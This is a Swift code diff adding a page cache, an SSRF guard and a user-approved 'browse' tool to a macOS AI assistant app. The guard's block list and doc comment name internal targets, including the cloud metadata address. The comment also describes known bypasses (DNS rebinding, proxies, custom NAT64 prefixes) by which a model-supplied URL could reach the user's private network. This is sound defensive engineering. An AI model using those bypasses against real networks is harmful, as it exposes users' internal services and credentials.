+
+    func put(_ rawURL: String, entry: Entry) {
+        let k = Self.key(for: rawURL)
+        memoryLock.lock()
+        insertLocked(k, entry: entry)
+        let writeID: UInt64?
+        if diskDirectory != nil {
+            nextDiskWriteID &+= 1
+            writeID = nextDiskWriteID
+            pendingDiskWrites[k] = writeID
+        } else {
+            writeID = nil
+        }
+        memoryLock.unlock()
+        // Disk I/O happens OUTSIDE the memory lock: writing a page + the LRU sweep
+        // touch the filesystem, which we don't want to serialise the (fast)
+        // in-memory paging path behind.
+        if let writeID {
+            writeToDisk(k, entry: entry, writeID: writeID)
+        }
+    }
+
+    // MARK: - Memory tier (lock held by callers)
+
+    private func insertLocked(_ k: String, entry: Entry) {
+        let cost = entry.markdown.utf8.count
+        if let old = store[k] {
+            totalBytes -= old.markdown.utf8.count
+            order.removeAll { $0 == k }
+        }
+        store[k] = entry
+        order.append(k)
+        totalBytes += cost
+        evictIfNeeded()
+    }
+
+    private func touch(_ k: String) {
+        order.removeAll { $0 == k }
+        order.append(k)
+    }
+
+    private func removeLocked(_ k: String) {
+        order.removeAll { $0 == k }
+        if let entry = store.removeValue(forKey: k) {
+            totalBytes -= entry.markdown.utf8.count
+        }
+    }
+
+    func expirationDate(for entry: Entry) -> Date {
+        entry.fetchedAt.addingTimeInterval(ttl)
+    }
+
+    private func isFresh(_ entry: Entry, now: Date = Date()) -> Bool {
+        guard ttl > 0 else { return false }
+        let age = now.timeIntervalSince(entry.fetchedAt)
+        // A small negative age tolerates a routine clock correction. A cache
+        // timestamp far in the future is corrupt and must not become immortal.
+        return age >= -300 && age < ttl
+    }
+
+    private func evictIfNeeded() {
+        while (order.count > maxEntries || totalBytes > maxBytes), let oldest = order.first {
+            order.removeFirst()
+            if let e = store.removeValue(forKey: oldest) {
+                totalBytes -= e.markdown.utf8.count
+            }
+        }
+    }
+
+    // MARK: - Disk tier
+
+    private func sweepDiskOnInitialization() {
+        guard let dir = diskDirectory else { return }
+        diskLock.lock(); defer { diskLock.unlock() }
+        if FileManager.default.fileExists(atPath: dir.path) {
+            try? FileManager.default.setAttributes(
+                [.posixPermissions: 0o700],
+                ofItemAtPath: dir.path
+            )
+        }
+        sweepDiskLocked(dir)
+    }
+
+    private func loadFromDisk(_ key: String) -> Entry? {
+        guard let dir = diskDirectory else { return nil }
+        diskLock.lock(); defer { diskLock.unlock() }
+        let url = dir.appendingPathComponent(Self.diskFileName(for: key), isDirectory: false)
+        // Validate the file size BEFORE reading it into memory. A corrupted or
+        // locally-modified entry can be arbitrarily large — the disk LRU sweep
+        // only bounds the directory total and never runs on the read path — so
+        // without this guard `Data(contentsOf:)` could allocate an unbounded
+        // buffer (and hang the main actor). A loaded entry is promoted into the
+        // memory tier, so we bound it by the disk-tier byte cap and treat
+        // anything larger as a miss, deleting it so it isn't re-checked forever.
+        let fileSize = (try? url.resourceValues(forKeys: [.fileSizeKey]))?.fileSize
+        guard let fileSize, fileSize <= maxDiskBytes else {
+            try? FileManager.default.removeItem(at: url)
+            return nil
+        }
+        guard let data = try? Data(contentsOf: url),
+              let entry = try? JSONDecoder().decode(Entry.self, from: data) else {
+            return nil
+        }
+        guard isFresh(entry) else {
+            try? FileManager.default.removeItem(at: url)
+            return nil
+        }
+        // A successful disk hit is an access for disk-tier LRU purposes.
+        try? FileManager.default.setAttributes(
+            [.modificationDate: Date(), .posixPermissions: 0o600],
+            ofItemAtPath: url.path
+        )
+        return entry
+    }
+
+    private func writeToDisk(_ key: String, entry: Entry, writeID: UInt64) {
+        guard let dir = diskDirectory else { return }
+        diskLock.lock(); defer { diskLock.unlock() }
+
+        // Memory updates intentionally do not wait on filesystem work. If a
+        // newer put for this key arrived while this call was waiting for the
+        // disk lock, drop this stale write so it cannot overwrite newer data.
+        guard isCurrentDiskWrite(key: key, writeID: writeID) else { return }
+        defer { completeDiskWrite(key: key, writeID: writeID) }
+
+        let fm = FileManager.default
+        // Best-effort persistence: a failure to create the directory or write
+        // the file just means this page won't survive a relaunch — the memory
+        // tier already served the current session, so we never surface the
+        // error to the tool caller.
+        guard ensureDiskDirectory(dir, fileManager: fm) else { return }
+        guard let data = try? JSONEncoder().encode(entry) else { return }
+        let url = dir.appendingPathComponent(Self.diskFileName(for: key), isDirectory: false)
+        // ``.atomic`` so a torn write never surfaces as a half-decoded page on
+        // the next read (loadFromDisk would just miss and re-fetch).
+        do {
+            try data.write(to: url, options: [.atomic])
+        } catch {
+            return
+        }
+        do {
+            try fm.setAttributes([.posixPermissions: 0o600], ofItemAtPath: url.path)
+        } catch {
+            // The write landed but could not be restricted. Discard it rather
+            // than leave browsed content world-readable.
+            try? fm.removeItem(at: url)
+            return
+        }
+        sweepDiskLocked(dir)
+    }
+
+    private func ensureDiskDirectory(_ dir: URL, fileManager fm: FileManager) -> Bool {
+        do {
+            try fm.createDirectory(
+                at: dir,
+                withIntermediateDirectories: true,
+                attributes: [.posixPermissions: 0o700]
+            )
+            try fm.setAttributes([.posixPermissions: 0o700], ofItemAtPath: dir.path)
+            return true
+        } catch {
+            return false
+        }
+    }
+
+    private func isCurrentDiskWrite(key: String, writeID: UInt64) -> Bool {
+        memoryLock.lock(); defer { memoryLock.unlock() }
+        return pendingDiskWrites[key] == writeID
+    }
+
+    private func completeDiskWrite(key: String, writeID: UInt64) {
+        memoryLock.lock(); defer { memoryLock.unlock() }
+        if pendingDiskWrites[key] == writeID {
+            pendingDiskWrites.removeValue(forKey: key)
+        }
+    }
+
+    /// LRU sweep of the persistent tier keyed on file modification time: delete
+    /// the oldest ``.json`` files until both the entry count and total byte caps
+    /// are satisfied. Conservative — a directory-listing failure is a no-op, and
+    /// only our own ``<64-hex>.json`` files are ever considered for deletion.
+    private func sweepDiskLocked(_ dir: URL) {
+        let fm = FileManager.default
+        guard let entries = try? fm.contentsOfDirectory(
+            at: dir,
+            includingPropertiesForKeys: [.contentModificationDateKey, .fileSizeKey],
+            options: [.skipsHiddenFiles]
+        ) else {
+            return
+        }
+        struct DiskFile {
+            let url: URL
+            let modified: Date
+            let size: Int
+        }
+        var files: [DiskFile] = []
+        var totalDiskBytes = 0
+        for entry in entries {
+            guard Self.isDiskCacheFileName(entry.lastPathComponent) else { continue }
+            let values = try? entry.resourceValues(forKeys: [.contentModificationDateKey, .fileSizeKey])
+            let modified = values?.contentModificationDate ?? .distantPast
+            let size = values?.fileSize ?? 0
+            files.append(DiskFile(url: entry, modified: modified, size: size))
+            totalDiskBytes += size
+        }
+        guard files.count > maxDiskEntries || totalDiskBytes > maxDiskBytes else { return }
+        // Oldest first — those are the eviction candidates.
+        files.sort { $0.modified < $1.modified }
+        var count = files.count
+        var bytes = totalDiskBytes
+        for file in files {
+            guard count > maxDiskEntries || bytes > maxDiskBytes else { break }
+            if (try? fm.removeItem(at: file.url)) != nil {
+                count -= 1
+                bytes -= file.size
+            }
+        }
+    }
+
+    /// True iff ``name`` is a ``<64-hex>.json`` file — the exact shape
+    /// ``diskFileName(for:)`` produces. The disk sweep refuses to delete
+    /// anything else in the directory.
+    static func isDiskCacheFileName(_ name: String) -> Bool {
+        guard name.hasSuffix(".json") else { return false }
+        let hex = name.dropLast(".json".count)
+        guard hex.count == 64 else { return false }
+        return hex.unicodeScalars.allSatisfy { c in
+            (c >= "0" && c <= "9") || (c >= "a" && c <= "f")
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/BrowseSSRFGuard.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BrowseSSRFGuard.swift
@@ -1,0 +1,305 @@
+import Foundation
+
+/// Server-Side-Request-Forgery guard for the ``browse`` tool.
+///
+/// `browse` turns a model-supplied URL into an HTTP GET whose response body is
+/// fed back to the model. Without a guard that is a pivot into the user's
+/// private network: `http://169.254.169.254/…` (cloud/EC2 metadata),
+/// `http://127.0.0.1:…` (local admin panels), `http://192.168.…` (LAN
+/// devices). So every host the fetch would contact — the initial URL AND every
+/// redirect hop — is resolved and checked against a blocklist of loopback,
+/// link-local, private, CGNAT, and other special-use ranges (IPv4 and IPv6),
+/// and only `http`/`https` are allowed.
+///
+/// Scope of the guarantee. This layer resolves the host and rejects the request
+/// before it runs if ANY resolved address is private — for the initial URL and
+/// for every redirect hop. That confines the *hostnames the model can name* to
+/// ones whose DNS currently points at public space. It is deliberately NOT a
+/// closed IP-confinement proof, because these residuals cannot be closed at
+/// this layer:
+///
+///  1. DNS-rebind TOCTOU. We resolve and validate, then `URLSession` re-resolves
+///     when it connects; a hostile resolver can hand us a public address and the
+///     socket a private one. `URLSession` exposes no hook to pin the validated
+///     address while preserving TLS SNI / certificate validation, so the pinned
+///     connection can't be expressed here.
+///  2. System / PAC HTTP proxies. If the OS is configured with a proxy, the
+///     proxy resolves and connects on its own, on a path our local resolution
+///     never sees — so a locally-public result does not prove the proxy's
+///     connection is public.
+///  3. Network-specific NAT64 prefixes. We unwrap the well-known (`64:ff9b::/96`)
+///     and RFC 8215 local-use (`64:ff9b:1::/48`) prefixes to range-check the
+///     embedded IPv4, but a site can deploy NAT64 under any prefix we can't know
+///     without that network's config, so a private IPv4 tunnelled through a
+///     custom NAT64 prefix reads as global IPv6 (see ``ParsedIP/nat64EmbeddedV4``).
+///
+/// These are acknowledged residuals, not covered by this guard. They are not
+/// left bare, though: the ``BrowseApprovalStore`` gate makes the user see and
+/// approve the exact host before the first request (and again on any
+/// cross-origin redirect), so exploitation requires the user to approve browsing
+/// an attacker-controlled domain; and the action is only a read-only GET whose
+/// body returns to the model — no code executes, no request body is sent. A
+/// fully IP-confined fetch would need a custom transport that connects to the
+/// validated address while setting TLS SNI/Host to the original hostname; that
+/// is out of scope for this tool and tracked as future hardening.
+enum BrowseSSRFGuard {
+    enum Rejection: Error, Equatable {
+        case badURL
+        case blockedScheme(String)
+        case noHost
+        case unresolvable(String)
+        case blockedAddress(host: String, address: String)
+
+        var message: String {
+            switch self {
+            case .badURL:
+                return "not a valid absolute URL"
+            case .blockedScheme(let s):
+                return "scheme '\(s)' is not allowed (only http/https)"
+            case .noHost:
+                return "URL has no host"
+            case .unresolvable(let h):
+                return "could not resolve host '\(h)'"
+            case .blockedAddress(let host, let address):
+                return "host '\(host)' resolves to a private/loopback address (\(address)) and cannot be browsed"
+            }
+        }
+    }
+
+    static let allowedSchemes: Set<String> = ["http", "https"]
+
+    /// Validate a URL's scheme + host end-to-end: the host is resolved to its
+    /// concrete addresses (or parsed directly if it is an IP literal) and every
+    /// address is range-checked. Throws ``Rejection`` on the first problem.
+    static func validate(_ url: URL) async throws {
+        guard let scheme = url.scheme?.lowercased() else { throw Rejection.badURL }
+        guard allowedSchemes.contains(scheme) else { throw Rejection.blockedScheme(scheme) }
+        guard let host = url.host, !host.isEmpty else { throw Rejection.noHost }
+
+        // Strip an IPv6 literal's brackets (URL.host keeps them off, but be
+        // defensive if a raw string sneaks through elsewhere).
+        let bareHost = host.hasPrefix("[") && host.hasSuffix("]")
+            ? String(host.dropFirst().dropLast())
+            : host
+
+        // An IP literal in the URL never touches DNS — validate it directly so
+        // `http://127.0.0.1` / `http://[::1]` are caught before any request.
+        if let literal = ParsedIP(bareHost) {
+            if literal.isBlocked {
+                throw Rejection.blockedAddress(host: host, address: literal.canonical)
+            }
+            return
+        }
+
+        let addresses = try await resolve(bareHost)
+        guard !addresses.isEmpty else { throw Rejection.unresolvable(host) }
+        for ip in addresses where ip.isBlocked {
+            throw Rejection.blockedAddress(host: host, address: ip.canonical)
+        }
+    }
+
+    /// Resolve a hostname to every A / AAAA address. Runs `getaddrinfo` off the
+    /// cooperative pool (it blocks). Returns `[]` (→ ``unresolvable``) on
+    /// lookup failure rather than throwing a raw errno.
+    static func resolve(_ host: String) async throws -> [ParsedIP] {
+        try await withCheckedThrowingContinuation { continuation in
+            DispatchQueue.global(qos: .userInitiated).async {
+                var hints = addrinfo(
+                    ai_flags: 0,
+                    ai_family: AF_UNSPEC,
+                    ai_socktype: SOCK_STREAM,
+                    ai_protocol: IPPROTO_TCP,
+                    ai_addrlen: 0,
+                    ai_canonname: nil,
+                    ai_addr: nil,
+                    ai_next: nil
+                )
+                var result: UnsafeMutablePointer<addrinfo>?
+                let status = getaddrinfo(host, nil, &hints, &result)
+                guard status == 0, let first = result else {
+                    // NXDOMAIN / no address → treat as unresolvable, not a crash.
+                    continuation.resume(returning: [])
+                    return
+                }
+                defer { freeaddrinfo(first) }
+                var out: [ParsedIP] = []
+                var node: UnsafeMutablePointer<addrinfo>? = first
+                while let cur = node {
+                    if let sa = cur.pointee.ai_addr {
+                        if let ip = ParsedIP(sockaddr: sa) { out.append(ip) }
+                    }
+                    node = cur.pointee.ai_next
+                }
+                continuation.resume(returning: out)
+            }
+        }
+    }
+}
+
+/// A resolved IP address (v4 or v6) with the range checks the guard needs.
+/// Parsed either from a textual literal or from a `sockaddr` `getaddrinfo`
+/// returned. All comparisons work on the raw bytes so there is no string
+/// canonicalisation to fool.
+struct ParsedIP: Equatable {
+    enum Family: Equatable { case v4, v6 }
+    let family: Family
+    /// 4 bytes for v4, 16 for v6 (network order / big-endian, as stored).
+    let bytes: [UInt8]
+
+    /// Parse a textual literal via `inet_pton` (no DNS). Returns nil if the
+    /// string is not a valid IPv4 or IPv6 literal.
+    init?(_ literal: String) {
+        var v4 = in_addr()
+        if literal.withCString({ inet_pton(AF_INET, $0, &v4) }) == 1 {
+            // `s_addr` already holds the 4 address bytes in NETWORK order in
+            // memory (a.b.c.d → [a, b, c, d]); read them as-is. (Applying
+            // `.bigEndian` would byte-swap on a little-endian host and reverse
+            // the octets — a silent, dangerous SSRF misclassification.)
+            var netAddr = v4.s_addr
+            self.family = .v4
+            self.bytes = withUnsafeBytes(of: &netAddr) { Array($0) }
+            return
+        }
+        var v6 = in6_addr()
+        if literal.withCString({ inet_pton(AF_INET6, $0, &v6) }) == 1 {
+            self.family = .v6
+            self.bytes = withUnsafeBytes(of: &v6) { Array($0) }
+            return
+        }
+        return nil
+    }
+
+    /// Extract the address bytes from a `sockaddr` (`AF_INET` / `AF_INET6`).
+    init?(sockaddr sa: UnsafePointer<sockaddr>) {
+        switch Int32(sa.pointee.sa_family) {
+        case AF_INET:
+            let bytes = sa.withMemoryRebound(to: sockaddr_in.self, capacity: 1) { sin -> [UInt8] in
+                // s_addr is already network-order in memory (see the literal
+                // init) — read the raw bytes without a byte-swap.
+                var netAddr = sin.pointee.sin_addr.s_addr
+                return withUnsafeBytes(of: &netAddr) { Array($0) }
+            }
+            self.family = .v4
+            self.bytes = bytes
+        case AF_INET6:
+            let bytes = sa.withMemoryRebound(to: sockaddr_in6.self, capacity: 1) { sin6 -> [UInt8] in
+                var addr = sin6.pointee.sin6_addr
+                return withUnsafeBytes(of: &addr) { Array($0) }
+            }
+            self.family = .v6
+            self.bytes = bytes
+        default:
+            return nil
+        }
+    }
+
+    /// Human-readable form for error messages (best-effort; falls back to a
+    /// byte dump). Never used for a security decision — the checks are on bytes.
+    var canonical: String {
+        switch family {
+        case .v4:
+            return bytes.map(String.init).joined(separator: ".")
+        case .v6:
+            var addr = in6_addr()
+            withUnsafeMutableBytes(of: &addr) { raw in
+                for (i, b) in bytes.enumerated() where i < 16 { raw[i] = b }
+            }
+            var buf = [CChar](repeating: 0, count: Int(INET6_ADDRSTRLEN))
+            if inet_ntop(AF_INET6, &addr, &buf, socklen_t(INET6_ADDRSTRLEN)) != nil {
+                let utf8 = buf.prefix { $0 != 0 }.map { UInt8(bitPattern: $0) }
+                return String(decoding: utf8, as: UTF8.self)
+            }
+            return bytes.map { String(format: "%02x", $0) }.joined()
+        }
+    }
+
+    /// True when the address falls in any loopback / link-local / private /
+    /// CGNAT / reserved / multicast range that a browse must never reach.
+    var isBlocked: Bool {
+        switch family {
+        case .v4:
+            return Self.isBlockedV4(bytes)
+        case .v6:
+            // IPv4-mapped (::ffff:a.b.c.d) and NAT64 carry a v4 address inside
+            // the v6 word — a `::ffff:127.0.0.1` or a NAT64-encoded loopback
+            // would otherwise slip past the v6 checks, so validate the embedded
+            // v4 too.
+            if isV4Mapped { return Self.isBlockedV4(Array(bytes[12..<16])) }
+            if let embedded = nat64EmbeddedV4 { return Self.isBlockedV4(embedded) }
+            return isBlockedV6
+        }
+    }
+
+    private var isV4Mapped: Bool {
+        // ::ffff:0:0/96 — first 10 bytes zero, bytes 10-11 == 0xFF.
+        guard bytes.count == 16 else { return false }
+        for i in 0..<10 where bytes[i] != 0 { return false }
+        return bytes[10] == 0xFF && bytes[11] == 0xFF
+    }
+
+    /// Embedded IPv4 for the well-known NAT64 prefix (RFC 6052 `64:ff9b::/96`)
+    /// and the RFC 8215 local-use prefix (`64:ff9b:1::/48`), per the RFC 6052
+    /// bit layout. Other NETWORK-SPECIFIC NAT64 prefixes can't be recognised
+    /// without that network's configuration; reaching one needs a NAT64 gateway
+    /// present AND its prefix known to the model, so it is a documented residual
+    /// (same class as DNS-rebind, see the type doc).
+    private var nat64EmbeddedV4: [UInt8]? {
+        guard bytes.count == 16 else { return nil }
+        // WKP 64:ff9b::/96 → v4 in the low 32 bits (bytes 12-15).
+        if Array(bytes[0..<12]) == [0x00, 0x64, 0xFF, 0x9B, 0, 0, 0, 0, 0, 0, 0, 0] {
+            return Array(bytes[12..<16])
+        }
+        // RFC 8215 64:ff9b:1::/48 → /48 layout: v4 = bytes 6,7,9,10 (byte 8 is
+        // the reserved "u" octet, skipped).
+        if Array(bytes[0..<6]) == [0x00, 0x64, 0xFF, 0x9B, 0x00, 0x01] {
+            return [bytes[6], bytes[7], bytes[9], bytes[10]]
+        }
+        return nil
+    }
+
+    static func isBlockedV4(_ b: [UInt8]) -> Bool {
+        guard b.count == 4 else { return true }   // malformed → fail closed
+        let a = b[0], c = b[1]
+        // 0.0.0.0/8 — "this host"
+        if a == 0 { return true }
+        // 10.0.0.0/8 — private
+        if a == 10 { return true }
+        // 100.64.0.0/10 — CGNAT
+        if a == 100 && (c & 0xC0) == 0x40 { return true }
+        // 127.0.0.0/8 — loopback
+        if a == 127 { return true }
+        // 169.254.0.0/16 — link-local (incl. 169.254.169.254 metadata)
+        if a == 169 && c == 254 { return true }
+        // 172.16.0.0/12 — private
+        if a == 172 && (c & 0xF0) == 0x10 { return true }
+        // 192.0.0.0/24 (IETF protocol assignments) + 192.0.2.0/24 (TEST-NET-1)
+        if a == 192 && c == 0 && (b[2] == 0 || b[2] == 2) { return true }
+        // 192.168.0.0/16 — private
+        if a == 192 && c == 168 { return true }
+        // 198.18.0.0/15 — benchmarking
+        if a == 198 && (c == 18 || c == 19) { return true }
+        // 198.51.100.0/24 + 203.0.113.0/24 — TEST-NET-2 / TEST-NET-3
+        if a == 198 && c == 51 && b[2] == 100 { return true }
+        if a == 203 && c == 0 && b[2] == 113 { return true }
+        // 224.0.0.0/4 multicast + 240.0.0.0/4 reserved (covers 255.255.255.255)
+        if a >= 224 { return true }
+        return false
+    }
+
+    private var isBlockedV6: Bool {
+        guard bytes.count == 16 else { return true }   // malformed → fail closed
+        // ::/128 unspecified and ::1/128 loopback
+        if bytes[0..<15].allSatisfy({ $0 == 0 }) && (bytes[15] == 0 || bytes[15] == 1) {
+            return true
+        }
+        // fc00::/7 — unique local addresses (fc00::/8 + fd00::/8)
+        if (bytes[0] & 0xFE) == 0xFC { return true }
+        // fe00::/8 — link-local (fe80::/10) + deprecated site-local (fec0::/10,
+        // which the earlier fe80-only check let through) + reserved. No global
+        // unicast lives here (that is 2000::/3), so block the whole /8.
+        if bytes[0] == 0xFE { return true }
+        // ff00::/8 — multicast
+        if bytes[0] == 0xFF { return true }
+        return false
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/BrowseTool.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BrowseTool.swift
@@ -1,0 +1,447 @@
+import Foundation
+
+/// `browse` — fetch a web page and return it as readable Markdown.
+///
+/// Design mirrors the other action tools: the model proposes, the USER approves
+/// (``BrowseApprovalStore``), and the fetch is confined — only `http`/`https`,
+/// every hop SSRF-checked (``BrowseSSRFGuard``), a byte cap, a timeout, and a
+/// bounded redirect chain. The page is extracted to Markdown
+/// (``HTMLToMarkdown``), the FULL body is cached (``BrowseContentCache``), and
+/// the tool returns a budgeted first slice plus a `next_offset` cursor so the
+/// model can page through a long document without re-fetching.
+enum BrowseTool {
+    /// Characters of rendered Markdown returned per call (the "15k budget").
+    static let charBudget = 15_000
+    /// Max response bytes we will download for one page.
+    static let maxResponseBytes = 2 * 1024 * 1024
+    /// Hard wall-clock ceiling for a single hop's fetch (seconds). Unlike
+    /// URLSession's idle timeout — which resets on every byte and lets a server
+    /// dribble one byte per interval to hold a hop open forever — this bounds the
+    /// TOTAL time one hop may take and cancels it when it expires. Applied per
+    /// hop (see ``fetchFollowingRedirects``).
+    static let requestTimeout: TimeInterval = 12
+    /// URLSession's own per-task resource backstop (seconds), a little above the
+    /// wall-clock ceiling so our ``withDeadline`` is the primary control and this
+    /// is defence-in-depth.
+    static let resourceTimeout: TimeInterval = 20
+    /// Max redirect hops we follow (each is SSRF-validated before we connect).
+    static let maxRedirects = 5
+
+    static let definition = ToolDefinition(
+        name: "browse",
+        description: "Fetch a web page (http/https) and return its readable content as Markdown. Use this to read articles, documentation, or any URL the user shares or you find via web_search. Long pages are paginated: the result includes 'next_offset' and 'has_more' — call browse again with that 'offset' to read the next part. Fetching from the network requires user approval; fresh cached pages are returned without prompting. Set refresh=true to fetch the latest version.",
+        parameters: .object([
+            "type": .string("object"),
+            "properties": .object([
+                "url": .object([
+                    "type": .string("string"),
+                    "description": .string("The absolute http(s) URL to fetch, e.g. 'https://example.com/article'.")
+                ]),
+                "offset": .object([
+                    "type": .string("integer"),
+                    "description": .string("Character offset for pagination. Omit (or 0) for the start of the page; pass the 'next_offset' from a previous browse call to continue reading the same URL.")
+                ]),
+                "refresh": .object([
+                    "type": .string("boolean"),
+                    "description": .string("Set true to bypass any cached copy and fetch the latest page. A network fetch requires user approval.")
+                ])
+            ]),
+            "required": .array([.string("url")])
+        ])
+    )
+
+    struct Args: Decodable {
+        let url: String
+        let offset: Int?
+        let refresh: Bool?
+    }
+
+    static func run(
+        arguments: String,
+        approval: BrowseApprovalStore,
+        cache: BrowseContentCache = .shared
+    ) async -> ToolCallResult {
+        let tool = "browse"
+        guard let data = arguments.data(using: .utf8),
+              let args = try? JSONDecoder().decode(Args.self, from: data) else {
+            return err(tool, "could not parse arguments JSON")
+        }
+        let rawURL = args.url.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !rawURL.isEmpty else { return err(tool, "empty url") }
+        let offset = max(0, args.offset ?? 0)
+
+        // Syntactic gate BEFORE any network or prompt: scheme allowlist, a host,
+        // and IP-literal range check (no DNS). A blocked URL is rejected without
+        // bothering the user with an approval it would only fail.
+        guard let url = URL(string: rawURL), let scheme = url.scheme?.lowercased() else {
+            return err(tool, "not a valid absolute URL")
+        }
+        guard BrowseSSRFGuard.allowedSchemes.contains(scheme) else {
+            return err(tool, "scheme '\(scheme)' is not allowed (only http/https)")
+        }
+        guard let host = url.host, !host.isEmpty else {
+            return err(tool, "URL has no host")
+        }
+        let bareHost = host.hasPrefix("[") && host.hasSuffix("]") ? String(host.dropFirst().dropLast()) : host
+        if let literal = ParsedIP(bareHost), literal.isBlocked {
+            return err(tool, "host '\(host)' is a private/loopback address (\(literal.canonical)) and cannot be browsed")
+        }
+
+        // Fresh cache hit → serve WITHOUT prompting or fetching. The cache is
+        // consulted BEFORE the approval gate: a page we already have (this
+        // session, an earlier page's fetch, or persisted to disk from a
+        // previous launch) is served straight back with zero network and no
+        // prompt while it remains inside the TTL. This covers both paging
+        // (offset > 0) and a re-read at offset 0. Expired entries and explicit
+        // refreshes fall through to the approval gate because they open a new
+        // request to the host.
+        if args.refresh != true, let cached = cache.get(rawURL) {
+            return sliceResult(
+                tool: tool,
+                rawURL: rawURL,
+                entry: cached,
+                offset: offset,
+                bytesFetched: nil,
+                cacheExpiresAt: cache.expirationDate(for: cached)
+            )
+        }
+
+        switch await approval.requestApproval(url: rawURL, host: host) {
+        case .deny:
+            return err(tool, "the user did not approve browsing \(host)")
+        case .allowOnce:
+            break
+        }
+        // Approval can take arbitrarily long (it waits on the user). If the tool
+        // call was cancelled while the sheet was up, don't now open a socket.
+        if Task.isCancelled { return err(tool, "browse was cancelled") }
+
+        do {
+            // Redirects that leave the approved origin get a fresh approval — the
+            // security model is "the user approved THIS host", and a server must
+            // not be able to silently bounce the fetch to an unseen destination.
+            let fetched = try await fetchFollowingRedirects(startURL: url) { redirectURL in
+                let rHost = redirectURL.host ?? redirectURL.absoluteString
+                switch await approval.requestApproval(url: redirectURL.absoluteString, host: rHost) {
+                case .allowOnce: return true
+                case .deny: return false
+                }
+            }
+            let rendered = await renderMarkdown(from: fetched)
+            let entry = BrowseContentCache.Entry(
+                title: rendered.title,
+                markdown: rendered.markdown,
+                finalURL: fetched.finalURL.absoluteString
+            )
+            cache.put(rawURL, entry: entry)
+            return sliceResult(
+                tool: tool,
+                rawURL: rawURL,
+                entry: entry,
+                offset: offset,
+                bytesFetched: fetched.data.count,
+                cacheExpiresAt: cache.expirationDate(for: entry)
+            )
+        } catch let rejection as BrowseSSRFGuard.Rejection {
+            return err(tool, rejection.message)
+        } catch {
+            return err(tool, error.localizedDescription)
+        }
+    }
+
+    // MARK: - Fetch (manual redirect following, SSRF-checked per hop)
+
+    struct Fetched {
+        let finalURL: URL
+        let data: Data
+        let mime: String?
+        let charset: String?
+    }
+
+    /// Follow redirects by hand so every hop is SSRF-validated before a socket
+    /// opens. `startURL` is assumed already user-approved; `approveRedirect` is
+    /// consulted only when a redirect leaves an already-approved origin, and a
+    /// `false` return aborts the fetch.
+    static func fetchFollowingRedirects(
+        startURL: URL,
+        approveRedirect: (URL) async -> Bool
+    ) async throws -> Fetched {
+        var current = startURL
+        var approvedOrigins: Set<String> = [origin(of: startURL)]
+        var hop = 0
+        while true {
+            // Validate (incl. DNS) BEFORE connecting to this hop's host.
+            try await BrowseSSRFGuard.validate(current)
+
+            var req = URLRequest(url: current)
+            req.timeoutInterval = requestTimeout
+            req.setValue(userAgent, forHTTPHeaderField: "User-Agent")
+            req.setValue("text/html,application/xhtml+xml,text/plain,application/json;q=0.9,*/*;q=0.8",
+                         forHTTPHeaderField: "Accept")
+            // Bind to a `let` so the @Sendable deadline closure captures an
+            // immutable value (URLRequest is a Sendable value type).
+            let request = req
+            // Hard wall-clock ceiling per hop — see ``requestTimeout``.
+            let raw = try await withDeadline(requestTimeout) { try await cappedBytes(request) }
+            guard let http = raw.response as? HTTPURLResponse else {
+                throw simpleError("no HTTP response from \(current.host ?? "host")")
+            }
+            if (300..<400).contains(http.statusCode), let loc = http.value(forHTTPHeaderField: "Location") {
+                hop += 1
+                guard hop <= maxRedirects else { throw simpleError("too many redirects (> \(maxRedirects))") }
+                guard let next = URL(string: loc, relativeTo: current)?.absoluteURL else {
+                    throw simpleError("redirect to an invalid URL")
+                }
+                // A redirect that crosses the approved origin needs a fresh OK —
+                // otherwise a trusted host could bounce the fetch to an unseen one.
+                let nextOrigin = origin(of: next)
+                if !approvedOrigins.contains(nextOrigin) {
+                    guard await approveRedirect(next) else {
+                        throw simpleError("the user did not approve the redirect to \(next.host ?? "the destination")")
+                    }
+                    if Task.isCancelled { throw simpleError("browse was cancelled") }
+                    approvedOrigins.insert(nextOrigin)
+                }
+                current = next
+                continue
+            }
+            guard (200..<300).contains(http.statusCode) else {
+                throw simpleError("HTTP \(http.statusCode) from \(current.host ?? "host")")
+            }
+            let (mime, charset) = parseContentType(http.value(forHTTPHeaderField: "Content-Type"))
+            return Fetched(finalURL: http.url ?? current, data: raw.data, mime: mime, charset: charset)
+        }
+    }
+
+    /// Normalised scheme://host:port so a redirect that only changes the path is
+    /// treated as same-origin (no re-prompt) while a host/scheme/port change is
+    /// cross-origin (re-prompt). Default ports are made explicit so
+    /// `http://h` and `http://h:80` compare equal.
+    static func origin(of url: URL) -> String {
+        let scheme = url.scheme?.lowercased() ?? ""
+        let host = url.host?.lowercased() ?? ""
+        let port = url.port ?? (scheme == "https" ? 443 : 80)
+        return "\(scheme)://\(host):\(port)"
+    }
+
+    /// Run `op` with a hard wall-clock ceiling: if it hasn't finished within
+    /// `seconds`, the timer wins, `op`'s task is cancelled, and we throw. Used to
+    /// turn URLSession's resettable idle timeout into a real per-hop deadline.
+    static func withDeadline<T: Sendable>(
+        _ seconds: TimeInterval,
+        _ op: @escaping @Sendable () async throws -> T
+    ) async throws -> T {
+        try await withThrowingTaskGroup(of: T.self) { group in
+            group.addTask { try await op() }
+            group.addTask {
+                try await Task.sleep(nanoseconds: UInt64(seconds * 1_000_000_000))
+                throw simpleError("hop exceeded \(Int(seconds))s deadline")
+            }
+            defer { group.cancelAll() }
+            guard let result = try await group.next() else {
+                throw simpleError("hop produced no result")
+            }
+            return result
+        }
+    }
+
+    /// Dedicated, isolated session for browsing. Ephemeral + cookies and cache
+    /// fully OFF: a public-content fetch must NOT accumulate or replay cookies
+    /// (which could send one site's session token to another, or hand
+    /// authenticated content to the model) and must not persist fetched pages to
+    /// disk. The session delegate blocks automatic redirects so ``BrowseTool``
+    /// follows them itself, SSRF-checking every hop before a socket opens.
+    static let session: URLSession = {
+        let config = URLSessionConfiguration.ephemeral
+        config.httpCookieStorage = nil
+        config.httpShouldSetCookies = false
+        config.httpCookieAcceptPolicy = .never
+        config.urlCache = nil
+        config.requestCachePolicy = .reloadIgnoringLocalCacheData
+        config.timeoutIntervalForRequest = requestTimeout
+        config.timeoutIntervalForResource = resourceTimeout
+        return URLSession(configuration: config, delegate: BrowseNoRedirectDelegate.shared, delegateQueue: nil)
+    }()
+
+    /// A fetched response body + its `URLResponse`, boxed as `Sendable` so it can
